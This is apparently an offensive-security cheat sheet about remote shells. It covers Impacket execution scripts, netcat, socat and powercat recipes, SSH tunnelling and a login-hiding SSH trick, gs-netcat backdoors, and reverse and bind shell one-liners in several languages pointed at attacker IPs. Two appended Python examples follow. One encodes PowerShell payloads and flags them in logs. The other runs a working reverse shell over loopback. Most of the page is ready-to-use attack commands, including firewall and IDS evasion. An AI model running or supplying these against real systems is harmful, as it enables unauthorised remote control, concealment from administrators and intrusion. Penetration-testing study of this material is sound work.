Shells

Shell Guides and Resources

Shell Collections
  • Impacket remote execution scripts

    • psexec.py: PSEXEC like functionality example using RemComSvc

    • smbexec.py: A similar approach to PSEXEC w/o using RemComSvc. The technique is described here. Our implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.

    • atexec.py: This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

    • wmiexec.py: A semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy.

    • dcomexec.py: A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects.

  • BlackArch Web Shells - Shell collection included in the BlackArch Linux distribution

  • Python PTY shells - Collection of full PTY shells in python

  • Operator Handbook: Reverse Shells - pg. 267

Misc Shells and Tools
  • dbd - dbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. dbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features.

  • sbd - sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only.

  • Reverse Shell and Post Exploitation tool - RSPET (Reverse Shell and Post Exploitation Tool) is a Python based reverse shell equipped with functionalities that assist in a post exploitation scenario.

  • Reverse Shell Generator - Cheater tool to generate reverse shell one liners

  • ShellPop - With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.

  • SQL webshell - Webshell that can run command line actions on the target as well as interact with an MSSQL database on the target.

  • Shellerator - Simple CLI tool for the generation of bind and reverse shells in multiple languages

  • donut - Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters

  • ibombshell - This package contains a tool written in Powershell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation).

  • Weevely webshell - Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime.

  • PyShell - Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells, the main goal of the tool is to use as little code as possible on the server side, regardless of the language used or the operating system of the server.

  • SharPyShell - tiny and obfuscated ASP.NET webshell for C# web applications

SSH
  • Basic Use: #ssh [user]@[host]

  • Use a specific key and port: #ssh -i ~/.ssh/id_rsa -p [port] [user]@[host]

  • SOCKS proxy: ssh -D8080 [user]@[host]

  • Execute a one-line command: ssh -i ~/.ssh/id_rsa [user]@[host] "command string"

  • Local Port Forward: ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

  • Remote Port Forward: ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]

  • SSH tunnel through T1 to T2: ssh [user]@[T1 IP] -L [local port]:[T2 IP]:[T2 port] -R [T1 port]:[local IP]:[local service port] (the -L reaches T2's port from your local port via T1; the -R publishes one of your local services on T1)

  • Almost invisible SSH

    ssh -o UserKnownHostsFile=/dev/null -T user@server.org "bash -i"

    Because -T requests no PTY, no login session is recorded in utmp/wtmp, so you will not show up in w, who or last. Passing "bash -i" as a command gives an interactive shell that is not a login shell, so .profile and .bash_profile are bypassed as well. On the client side, UserKnownHostsFile=/dev/null stops the host key from being written to ~/.ssh/known_hosts. Note that sshd still logs the authentication itself (auth.log or the journal); this hides the session from utmp-based tools only.

  • SSH tunnel OUT

    We use this all the time to circumvent local firewalls and IP filtering:

    ssh -g -L31337:1.2.3.4:80 user@server.org

    You or anyone else can now connect to your computer on port 31337 and get tunneled to 1.2.3.4 port 80 and appear with the source IP of 'server.org'. An alternative and without the need for a server is to use gs-netcat.

  • SSH tunnel IN

    We use this to give a friend access to an internal machine that is not on the public Internet:

    ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@server.org

    Anyone connecting to server.org:31338 will get tunneled to 192.168.0.5 on port 80 via your computer. ExitOnForwardFailure=yes makes ssh exit instead of silently continuing if the remote port cannot be bound. Note that for -R forwards the bind address is decided by the server, not by -g: the port binds to loopback on server.org unless sshd_config has GatewayPorts yes (or clientspecified). An alternative, without the need for a server, is to use gs-netcat.

  • SSH socks4/5 OUT

    Dynamic forwarding with -D turns the ssh client into a local SOCKS4/5 proxy. Example: tunnel all your browser traffic through your server.

    ssh -D 1080 user@server.org

    Now configure your browser to use SOCKS with 127.0.0.1:1080. All your traffic is now tunneled through server.org and will appear with the source IP of server.org. An alternative, without the need for a server, is to use gs-netcat.

  • SSH socks4/5 IN

    This is the reverse of the above: reverse dynamic forwarding (-R with a port but no destination, added in OpenSSH 7.6) makes the server side listen as a SOCKS proxy with your computer as the tunnel end-point. It gives others access to your local network or lets them use your computer as a tunnel end-point.

    ssh -g -R 1080 user@server.org

    The others configure server.org:1080 as their SOCKS4/5 proxy. They can now connect to any computer on any port that your computer has access to, including computers behind your firewall on your local network. As with any -R forward, the port binds to loopback on server.org unless sshd's GatewayPorts option allows otherwise. An alternative, without the need for a server, is to use gs-netcat.

Netcat - The original shell tool.
  • Set Listener

    • # nc -nlvp [port]

  • Connect to port

    • # nc -nv [ip] [port]

  • Push a file over netcat

    • #nc -nv [ip] [port] < /full/path/to/file.exe

  • Catch a pushed file and write it to new file

    • #nc -nvlp [port] > incoming.exe

  • Launch command upon connection

    • #nc -nlvp [port] -e cmd.exe

  • Upgrade a non-interactive shell to a PTY

    • Check which python interpreters are available in /usr/bin (python, python2.6, python3, ...) and use whichever is present

    • # python -c "import pty; pty.spawn('/bin/bash')"

  • Reverse shell

    • TARGET # nc [ip] [port] -e /bin/bash

    • ATTACKER # nc -n -vv -l -p [port]

  • Netcat with GAPING_SECURITY_HOLE disabled (no -e option)

    • When the -e option (execute a program after connect) is not available, use a named pipe ("backpipe") on the file system so that netcat's output is fed into /bin/bash and bash's output is written back into netcat

    • TARGET # mknod backpipe p && nc [ip] [port] 0<backpipe | /bin/bash 1>backpipe

    • ATTACKER # nc -n -vv -l -p [port]

  • Netcat without netcat (/dev/tcp)

    • TARGET # /bin/bash -i > /dev/tcp/[IP]/[port] 0<&1 2>&1

    • ATTACKER # nc -n -vv -l -p [port]

  • Netcat without netcat or /dev/tcp (telnet plus backpipe)

    • TARGET # mknod backpipe p && telnet [ip] [port] 0<backpipe | /bin/bash 1>backpipe

    • ATTACKER # nc -n -vv -l -p [port]

  • Linux bind shell listener, executes /bin/sh on connection

    • #mkfifo /tmp/f; nc -lvnp [port] < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

  • Operator Handbook: Netcat - pg. 209

Socat - The upgraded and encryptable Netcat

  • https://github.com/3ndG4me/socat - Socat standalone binary collection

  • Socat - establishes two bidirectional byte streams and transfers data between them

  • Reverse shell - Linux target connects to attacker IP and port

    • # socat TCP:[ip]:[port] EXEC:"bash -li",pty,stderr,sigint,setsid,sane

  • Reverse shell - Windows target connects to attacker IP and port

    • # socat TCP:[ip]:[port] EXEC:powershell.exe,pipes

  • Sets listener on port (socat needs two addresses; "-" is stdio)

    • # socat - TCP-L:[port]

  • Sets listener with a stable (full TTY) shell, to be used with the pty reverse shell above

    • # socat TCP-L:[port] FILE:`tty`,raw,echo=0

  • Shares file on port

    • # socat TCP-L:[port],fork file:[file name]

  • Encrypted shell

    • Uses OpenSSL to create a self-signed certificate; verify=0 on both ends disables certificate checking, so this encrypts the traffic but does not authenticate the peer

    • # openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

    • # cat shell.key shell.crt > shell.pem

    • Reverse shell listener (attacker)

      • #sudo socat OPENSSL-LISTEN:443,cert=shell.pem,verify=0 FILE:`tty`,raw,echo=0

    • Reverse shell (target)

      • #sudo socat OPENSSL:[ip]:[port],verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

    • Bind shell

      • Target: #socat OPENSSL-LISTEN:[port],cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

      • Attacker: #socat OPENSSL:[ip]:[port],verify=0 -

Powercat - Netcat: The PowerShell version (PowerShell 2 and later supported)

  • Enabling PowerShell script execution

    • Open PowerShell as administrator (select Yes at the User Account Control prompt) and run Set-ExecutionPolicy Unrestricted so that powercat.ps1 can be loaded. Alternatively, powershell.exe -ExecutionPolicy Bypass applies to that one process only and leaves the machine-wide policy unchanged.

  • Script we can download to a windows host to leverage Powershell and simplify shells

  • Install on linux

    • #apt install powercat

    • places in /usr/share/windows-resources/powercat

  • Set up

    • With the script on the target host, we start by using a PowerShell feature known as Dot-sourcing to load the powercat.ps1 script. This will make all variables and functions declared in the script available in the current PowerShell scope. In this way, we can use the powercat function directly in PowerShell instead of executing the script each time.

      • >. .\powercat.ps1

    • If the target machine can reach the internet, the same can be done with a remote copy of the script by downloading it and passing its contents to the iex cmdlet (an alias for Invoke-Expression)

  • Powercat file transfers

    • Set up a listener on Attackers Kali instance

      • # sudo nc -lnvp 443 > receiving_powercat.ps1

    • Invoke power cat on sending windows machine

      • > powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1

      • -c specifies client mode and sets the address to connect to (the listener's IP)

      • -p is the destination port

      • -i indicates the local file that will be transferred remotely

  • Reverse shells

    • > powercat -c [dest ip] -p [dest port] -e cmd.exe

  • Bind shells - listener

    • > powercat -l -p [listener port] -e cmd.exe

  • Stand Alone Payloads

    • Saving the powercat functionality and given commands as a script

    • > powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1

    • > ./reverseshell.ps1

    • Warning: these scripts are rather large and contain hard-coded strings that will trigger IDS signatures

      • Powershell can execute Base64 encoded commands

      • We can use the -ge option when redirecting to an output file.

      • > powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1

      • The encoded output is not a script that can be executed as-is; instead, pass its contents to powershell.exe as an encoded command

      • > powershell.exe -E [encoded command string]
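What powercat's -ge output (and the -E argument above) actually contains is the script encoded as UTF-16LE and then base64. The following is an added example, not part of the cheat sheet or of the powercat project: it reproduces that encoding, and, because the IDS warning above is about hard-coded strings, it also decodes encoded commands found in process-creation log lines and reports which well-known indicator strings they contain. The log lines, the indicator list and the abbreviated payload are constructed for this example.

```python
"""Added example: powershell.exe -E/-EncodedCommand encoding, plus a small
triage routine over constructed process-creation log lines.
"""
import base64
import re

# An abbreviated copy of the page's PowerShell reverse shell, used as sample input.
REVERSE_SHELL = (
    "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);"
    "$stream = $client.GetStream();"
    "$sendback = (iex $data 2>&1 | Out-String)"
)

# Example indicator list: strings a detection engineer would key on in decoded PowerShell.
INDICATORS = ("TCPClient", "GetStream", "iex", "Invoke-Expression",
              "DownloadString", "FromBase64String")

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; the common
# spellings are listed here. The argument is a single base64 token.
_ENC_ARG = re.compile(
    r"(?<![\w-])-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})",
    re.IGNORECASE,
)


def encode_powershell_command(script: str) -> str:
    """Produce the value powershell.exe -E expects (this is what powercat -ge emits)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(b64: str) -> str:
    """Reverse of the above; raises ValueError/UnicodeDecodeError on garbage."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def find_encoded_commands(cmdline: str):
    """Return (decoded_script, matched_indicators) for every encoded argument in a command line."""
    found = []
    for m in _ENC_ARG.finditer(cmdline):
        try:
            script = decode_powershell_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            continue  # not an encoded command after all (or truncated in the log)
        hits = [ind for ind in INDICATORS
                if re.search(r"\b" + re.escape(ind) + r"\b", script, re.IGNORECASE)]
        found.append((script, hits))
    return found


def triage(lines):
    """Return (line_index, decoded_script, hits) for lines whose encoded payload matches an indicator."""
    flagged = []
    for i, line in enumerate(lines):
        for script, hits in find_encoded_commands(line):
            if hits:
                flagged.append((i, script, hits))
    return flagged


# Constructed process-creation log lines (Sysmon-style CommandLine fields).
SAMPLE_LOGS = [
    'CommandLine: powershell.exe -ExecutionPolicy Unrestricted -Command "Get-Service"',
    "CommandLine: powershell.exe -NoP -W Hidden -E " + encode_powershell_command(REVERSE_SHELL),
    "CommandLine: powershell.exe -enc " + encode_powershell_command("Get-Date"),
]

if __name__ == "__main__":
    for i, script, hits in triage(SAMPLE_LOGS):
        print(f"line {i}: {hits} in {script[:60]}...")
```

Only the second sample line is flagged: the first has no encoded argument and the third decodes to a harmless Get-Date. The UTF-16LE step is the detail people get wrong when trying to decode these by hand; plain base64 of ASCII will not run under -E.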

gsocket resources

This package contains Netcat on steroids with firewall and IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic, and it is fully scriptable with Python (PSE).

Connect like there is no firewall. Securely. The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely. More on https://www.gsocket.io.

The Global Socket Toolkit comes with a set of tools:

  • gsocket - Makes an existing program (behind firewall or NAT) accessible from anywhere in the world. It does so by analyzing the program and replacing the IP-Layer with its own Gsocket-Layer. A client connection to a hostname ending in '*.gsocket' then gets automatically redirected (via the GSRN) to this program.

  • gs-netcat - Netcat on steroids. Turn gs-netcat into an AES-256 encrypted reverse backdoor via TOR (optional) with a true PTY/interactive command shell (gs-netcat -s MySecret -i), integrated file-transfer, spawn a Socks4/4a/5 proxy or forward TCP connections or give somebody temporary shell access.

  • gs-sftp - sftp server & client between two firewalled workstations (gs-sftp -s MySecret)

  • gs-mount - Access and mount a remote file system (gs-mount -s MySecret ~/mnt/warez)

  • blitz - Copy data from workstation to workstation (blitz -s MySecret /usr/share/*)

  • ...many more examples and tools.

  • Reverse shell with gs-netcat

    Use gs-netcat. It spawns a fully functioning PTY reverse shell using the Global Socket Relay Network. Both ends find each other through a 'password hash' derived from the shared secret instead of an IP address, so you do not need to run your own Command & Control server for the backdoor to connect back to. Anyone who knows the secret can connect, so treat it like a password. If netcat is a swiss army knife then gs-netcat is a german battle axe :>

    gs-netcat -s MySecret -l -i    # Host

    Use -D to start the reverse shell in the background (daemon) with a watchdog that auto-restarts it if killed.

    To connect to the shell from your workstation:

    gs-netcat -s MySecret -i

    Use -T to tunnel through TOR.

Shell One-Liners

  • Bash

    • bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

  • Netcat without -e flag

    • #rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f

  • Netcat

    • #nc -e /bin/sh 10.10.10.10 4443

  • Netcat windows

    • #nc -e cmd.exe 10.10.10.10 4443

  • Perl

    • perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

  • Python

    • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

  • PHP

    • php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

  • Ruby

    • ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

  • Java (Groovy syntax, e.g. for a script console)

    • r = Runtime.getRuntime()

    • p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])

    • p.waitFor()

  • Powershell - reverse shell

    • >powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

  • Powershell Bind shell

    • >powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
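All of the reverse shells above, from the netcat and backpipe recipes earlier on the page to the Python and Perl one-liners here, are the same plumbing: the target connects out, points the shell's stdin/stdout/stderr at the socket, and execs a shell; the attacker just listens. The following is an added example, not code from the cheat sheet: it runs both ends on 127.0.0.1 so the mechanics can be exercised offline. start_listener() plays the attacker's nc -lvnp [port], reverse_shell_source() is the target side (the page's Python one-liner written out with dup2 over fds 0/1/2), and run_demo() drives both and returns what the shell sent back. It assumes a POSIX /bin/sh and that loopback sockets are permitted; the host, port and commands are chosen here for the example.

```python
"""Added example: the Python reverse-shell one-liner and its listener,
wired together on 127.0.0.1.
"""
import socket
import subprocess
import sys
import textwrap


def reverse_shell_source(host: str, port: int) -> str:
    """Target-side payload as Python source: the same technique as the
    one-liner on this page, just formatted readably."""
    return textwrap.dedent(f"""\
        import os, socket, subprocess
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(({host!r}, {port}))
        # After dup2, the shell's stdin/stdout/stderr *are* the socket:
        # whatever the listener sends is read by sh, whatever sh prints goes back.
        for fd in (0, 1, 2):
            os.dup2(s.fileno(), fd)
        subprocess.call(["/bin/sh", "-i"])
    """)


def start_listener(host: str = "127.0.0.1", port: int = 0) -> socket.socket:
    """Attacker side: bind and listen like `nc -lvnp`. port=0 asks the OS
    for a free port, which keeps the example runnable anywhere."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def run_demo(commands, timeout: float = 15.0) -> str:
    """Spawn the payload as a child process, accept its connection, send the
    commands followed by `exit`, and return everything the shell wrote back
    (prompts from `sh -i` included, since stderr is the socket too)."""
    srv = start_listener()
    srv.settimeout(timeout)
    host, port = srv.getsockname()
    payload = reverse_shell_source(host, port)
    # The child's inherited stdio is irrelevant: the payload replaces fds 0/1/2.
    proc = subprocess.Popen(
        [sys.executable, "-c", payload],
        stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
    )
    chunks = []
    try:
        conn, _ = srv.accept()          # the target's "connect to [ip] [port]" arriving
        conn.settimeout(timeout)
        with conn:
            conn.sendall(("\n".join(commands) + "\nexit\n").encode())
            while True:
                data = conn.recv(4096)
                if not data:            # sh exited -> payload exits -> EOF on the socket
                    break
                chunks.append(data)
        proc.wait(timeout=timeout)
    finally:
        srv.close()
        if proc.poll() is None:
            proc.kill()
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    print(run_demo(["echo reverse-shell-ok", "id"]))
```

The returned text contains the `$ ` prompts and, on dash, a "can't access tty; job control turned off" warning, because the shell has a socket rather than a terminal on its file descriptors. That is exactly the limitation the "upgrade a non-interactive shell" step with pty.spawn addresses.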
